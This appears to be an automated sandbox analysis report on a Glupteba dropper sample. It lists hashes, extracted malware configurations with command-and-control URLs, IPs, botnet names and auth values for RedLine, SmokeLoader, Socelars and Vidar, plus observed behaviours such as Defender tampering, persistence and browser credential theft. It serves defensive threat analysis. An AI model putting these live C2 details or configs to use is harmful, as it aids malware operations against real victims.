glupteba | 425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5

Analysis

max time kernel
105s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
10-03-2022 23:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe
Size

8.5MB
MD5

511a40df4806fd429b8e79770e5db32b
SHA1

672aebe15b9b5d4c14164b5a1380c063cd35dd25
SHA256

425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5
SHA512

8782fce73681b092697053c8bdcc4b8679e2055a2b821b4e10285a04b4af2ed6904d9db57b4caa5aefd2e2539d3b9051f456e1f5d7584f73c6179a1170d4e187

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

dadad123

86.107.197.196:63065

Attributes

auth_value
dd4834614a3ac04a7b90791c224626a2

Extracted

Family

vidar

Version

50.6

Botnet

937

https://mas.to/@s4msalo

https://koyu.space/@samsa2l

Attributes

profile_id
937

Extracted

Family

redline

Botnet

newall

deyneyab.xyz:80

Attributes

auth_value
25db96cfa370a37f57d1a769f3900122

Extracted

Family

redline

Botnet

Lyla2

bonezarisor.xyz:80

Attributes

auth_value
de2a98abc502b86b809fbc366af9256a

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5068-169-0x00000000014C0000-0x0000000001DE6000-memory.dmp	family_glupteba
behavioral2/memory/5068-173-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral2/memory/3884-192-0x0000000001680000-0x0000000001FA6000-memory.dmp	family_glupteba
behavioral2/memory/3884-193-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral2/memory/4776-197-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1076 3984 rUNdlL32.eXe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1076	3984	rUNdlL32.eXe

RedLine Payload 22 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1928-206-0x0000000000A90000-0x0000000000DF2000-memory.dmp	family_redline
behavioral2/memory/1928-207-0x0000000000A90000-0x0000000000DF2000-memory.dmp	family_redline
behavioral2/memory/1928-209-0x0000000000A90000-0x0000000000DF2000-memory.dmp	family_redline
C:\Users\Admin\Documents\S0ejCs2H7HY5kLj7lafpN2ZH.exe	family_redline
C:\Users\Admin\Documents\S0ejCs2H7HY5kLj7lafpN2ZH.exe	family_redline
behavioral2/memory/5360-240-0x0000000000B10000-0x0000000000E55000-memory.dmp	family_redline
behavioral2/memory/1312-248-0x0000000000FE0000-0x0000000001000000-memory.dmp	family_redline
behavioral2/memory/1928-249-0x0000000000A90000-0x0000000000DF2000-memory.dmp	family_redline
behavioral2/memory/5360-253-0x0000000000B10000-0x0000000000E55000-memory.dmp	family_redline
behavioral2/memory/5360-250-0x0000000000B10000-0x0000000000E55000-memory.dmp	family_redline
behavioral2/memory/5360-256-0x0000000000B10000-0x0000000000E55000-memory.dmp	family_redline
behavioral2/memory/5360-236-0x0000000000B10000-0x0000000000E55000-memory.dmp	family_redline
behavioral2/memory/5944-290-0x0000000000C30000-0x0000000000F62000-memory.dmp	family_redline
behavioral2/memory/5764-291-0x0000000000FF0000-0x0000000001327000-memory.dmp	family_redline
behavioral2/memory/6052-293-0x0000000000C30000-0x0000000000F62000-memory.dmp	family_redline
behavioral2/memory/5764-298-0x0000000000FF0000-0x0000000001327000-memory.dmp	family_redline
behavioral2/memory/5472-305-0x0000000000B40000-0x0000000000E85000-memory.dmp	family_redline
behavioral2/memory/5784-302-0x0000000000C10000-0x0000000000F49000-memory.dmp	family_redline
behavioral2/memory/6052-301-0x0000000000C30000-0x0000000000F62000-memory.dmp	family_redline
behavioral2/memory/5944-297-0x0000000000C30000-0x0000000000F62000-memory.dmp	family_redline
behavioral2/memory/5784-289-0x0000000000C10000-0x0000000000F49000-memory.dmp	family_redline
behavioral2/memory/5472-288-0x0000000000B40000-0x0000000000E85000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

svchost.exe

description pid process target process

PID 3260 created 5068 3260 svchost.exe Info.exe
PID 3260 created 4776 3260 svchost.exe csrss.exe
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

description	pid	process	target process
PID 3260 created 5068	3260	svchost.exe	Info.exe
PID 3260 created 4776	3260	svchost.exe	csrss.exe

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5376-269-0x0000000002130000-0x0000000002174000-memory.dmp	family_onlylogger
behavioral2/memory/5376-270-0x0000000000400000-0x0000000000492000-memory.dmp	family_onlylogger

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/5200-274-0x00000000021C0000-0x000000000226C000-memory.dmp	family_vidar
behavioral2/memory/5200-275-0x0000000000400000-0x00000000004CD000-memory.dmp	family_vidar

Downloads MZ/PE file

Executes dropped EXE 45 IoCs

Processes:

Files.exeKRSetp.exejfiag3g_gg.exeInstall.exeFolder.exeInfo.exeFolder.exeInstallation.exepub2.exemysetold.exemd9_1sjm.exeComplete.exejfiag3g_gg.exeInfo.execsrss.exeeRiPsvQODoTtVRqaYfYBs9Ro.exe_vIlbqtH7cKSHV_aT4iNDb4v.exelVCwOAa5tRGKKltwVFVNBJM7.exenOu1S4a1NeUJWBxLyCyJ_zHc.exeJZ2Ul6MAL_ZVIvnh7V5FsASs.exeAHeldDGWMRASVUJ7xscUErjc.exeS0ejCs2H7HY5kLj7lafpN2ZH.exeV2lyN2j8VNViGUyTYAcXM99i.exeMP3vMwyz_y9xfrcalRh04O05.exeA7bwgO7kepN2yOTZdpfx7wZW.exe_3GLVcKz0uoIA6qDKzyLnXFQ.exeAfyZYeqkyZgvbXNLdKnZSXkP.exeMztwjVu1eZ4Dw1xwaUu_ByGb.exeyDz5CdaJHjhHliz1RANETFJI.exeB3qEXZPy_N12bXLVx3VwZOMK.exeSMuUnQc7IWlJf4RiHIuPC0Pk.exeinjector.exeinjector.exeinjector.exeinjector.exeC8LAA.exeinjector.exeG4GC4.exeinjector.exeKGL50.exeinjector.exeKGL50.exeJ7BEL.exeIL2MJM8MLFKC5C2.exedJnOX0WqjR76U1sMBkkGmAgZ.exe

pid	process
4044	Files.exe
3492	KRSetp.exe
1160	jfiag3g_gg.exe
4764	Install.exe
3944	Folder.exe
5068	Info.exe
2456	Folder.exe
2836	Installation.exe
1736	pub2.exe
2744	mysetold.exe
4072	md9_1sjm.exe
2400	Complete.exe
1608	jfiag3g_gg.exe
3884	Info.exe
4776	csrss.exe
100	eRiPsvQODoTtVRqaYfYBs9Ro.exe
1928	_vIlbqtH7cKSHV_aT4iNDb4v.exe
4508	lVCwOAa5tRGKKltwVFVNBJM7.exe
1904	nOu1S4a1NeUJWBxLyCyJ_zHc.exe
4320	JZ2Ul6MAL_ZVIvnh7V5FsASs.exe
2564	AHeldDGWMRASVUJ7xscUErjc.exe
1312	S0ejCs2H7HY5kLj7lafpN2ZH.exe
2500	V2lyN2j8VNViGUyTYAcXM99i.exe
5200	MP3vMwyz_y9xfrcalRh04O05.exe
5360	A7bwgO7kepN2yOTZdpfx7wZW.exe
5376	_3GLVcKz0uoIA6qDKzyLnXFQ.exe
5384	AfyZYeqkyZgvbXNLdKnZSXkP.exe
5392	MztwjVu1eZ4Dw1xwaUu_ByGb.exe
5436	yDz5CdaJHjhHliz1RANETFJI.exe
5472	B3qEXZPy_N12bXLVx3VwZOMK.exe
5492	SMuUnQc7IWlJf4RiHIuPC0Pk.exe
5572	injector.exe
5656	injector.exe
5736	injector.exe
5744	injector.exe
5764	C8LAA.exe
5772	injector.exe
5784	G4GC4.exe
5800	injector.exe
5944	KGL50.exe
5996	injector.exe
6052	KGL50.exe
6124	J7BEL.exe
2320	IL2MJM8MLFKC5C2.exe
5648	dJnOX0WqjR76U1sMBkkGmAgZ.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe	vmprotect
behavioral2/memory/4072-158-0x0000000000400000-0x0000000000759000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exeFolder.exeComplete.exeInstallation.exeyDz5CdaJHjhHliz1RANETFJI.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Complete.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Installation.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	yDz5CdaJHjhHliz1RANETFJI.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

1692 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1692	rundll32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exeInfo.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RestlessPine = "\"C:\\Windows\\rss\\csrss.exe\""	Info.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

19 ipinfo.io
186 ipinfo.io
188 ipinfo.io
4 ip-api.com
18 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

flow	ioc
19	ipinfo.io
186	ipinfo.io
188	ipinfo.io
4	ip-api.com
18	ipinfo.io

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\mysetold.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\mysetold.exe	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

Processes:

_vIlbqtH7cKSHV_aT4iNDb4v.exeV2lyN2j8VNViGUyTYAcXM99i.exeA7bwgO7kepN2yOTZdpfx7wZW.exeB3qEXZPy_N12bXLVx3VwZOMK.exeG4GC4.exeKGL50.exeC8LAA.exeKGL50.exe

pid	process
1928	_vIlbqtH7cKSHV_aT4iNDb4v.exe
2500	V2lyN2j8VNViGUyTYAcXM99i.exe
5360	A7bwgO7kepN2yOTZdpfx7wZW.exe
5472	B3qEXZPy_N12bXLVx3VwZOMK.exe
5784	G4GC4.exe
5944	KGL50.exe
5764	C8LAA.exe
6052	KGL50.exe

Drops file in Windows directory 2 IoCs

Processes:

Info.exe

description ioc process

File created C:\Windows\rss\csrss.exe Info.exe
File opened for modification C:\Windows\rss Info.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\rss\csrss.exe	Info.exe
File opened for modification	C:\Windows\rss	Info.exe

Program crash 13 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3120	1692	WerFault.exe	rundll32.exe
5480	100	WerFault.exe	eRiPsvQODoTtVRqaYfYBs9Ro.exe
5652	2836	WerFault.exe	Installation.exe
5528	4320	WerFault.exe	JZ2Ul6MAL_ZVIvnh7V5FsASs.exe
5536	4320	WerFault.exe	JZ2Ul6MAL_ZVIvnh7V5FsASs.exe
5716	5376	WerFault.exe	_3GLVcKz0uoIA6qDKzyLnXFQ.exe
3212	5376	WerFault.exe	_3GLVcKz0uoIA6qDKzyLnXFQ.exe
4012	100	WerFault.exe	eRiPsvQODoTtVRqaYfYBs9Ro.exe
2344	5376	WerFault.exe	_3GLVcKz0uoIA6qDKzyLnXFQ.exe
6320	5628	WerFault.exe	SearchApp.exe
6540	5376	WerFault.exe	_3GLVcKz0uoIA6qDKzyLnXFQ.exe
3720	5376	WerFault.exe	_3GLVcKz0uoIA6qDKzyLnXFQ.exe
5832	6692	WerFault.exe	SearchApp.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2112 schtasks.exe
6996 schtasks.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

6580 tasklist.exe
6816 tasklist.exe

pid	process
2112	schtasks.exe
6996	schtasks.exe

pid	process
6580	tasklist.exe
6816	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3884 taskkill.exe

pid	process
3884	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Info.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	Info.exe
